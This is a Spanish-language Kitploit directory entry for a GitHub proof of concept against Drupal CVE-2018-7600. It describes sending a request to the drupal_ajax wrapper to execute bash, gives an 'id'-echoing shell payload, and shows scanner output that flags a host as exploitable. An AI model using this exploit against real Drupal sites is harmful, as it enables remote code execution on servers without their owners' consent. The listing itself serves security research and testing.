Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-7600 — Prueba de concepto para Drupal CVE-2018-7600 / SA-CORE-2018-002 | Kitploit
Herramientas/GitHubGitHub/thehappydinoa/cve-2018-7600
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónDesarrollo de PayloadsArchived
GitHubthehappydinoa/cve-2018-7600

CVE-2018-7600

Prueba de concepto para Drupal CVE-2018-7600 / SA-CORE-2018-002

Ver Repositorio
71hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Prueba de concepto para CVE-2018-7600 / SA-CORE-2018-002 codebeat badge

Drupal antes de la versión 7.58, 8.x antes de la 8.3.9, 8.4.x antes de la 8.4.6 y 8.5.x antes de la 8.5.1 permite a atacantes remotos ejecutar código arbitrario debido a un problema que afecta a múltiples subsistemas con configuraciones de módulos predeterminadas o comunes.

Cómo funciona

  1. Envía un paquete al wrapper drupal_ajax para registrar un usuario. Permite al usuario usar el marcado exec y ejecutar bash. Este PoC envía el nombre de usuario y el id a abcde.txt.

    root@kitploit:~
    echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee abcde.txt
    
  • Comprueba http*://example.com/abcde.txt

    root@kitploit:~
    [!] PROVIDED ONLY FOR EDUCATIONAL OR INFORMATION PURPOSES.
    [?] Enter file name (example: /root/file/hosts.txt): hosts.txt
    [+] https://example.com/ Possibly exploitable
    [~] Checking... https://example.com/abcde.text
    [+] https://example.com/ Exploitable
    [+] UID: 33 Name: www-data
    [+] Deleting... https://example.com/abcde.text
    
  • Payloads

    %s = nombre del archivo

    Payload de ID de usuario, PID y Grupo

    root@kitploit:~
    echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee %s
    

    Agradecimientos

    • Gracias a Vitalii Rudnykh

    Proporcionado solo con fines educativos o informativos.

    Descargar herramienta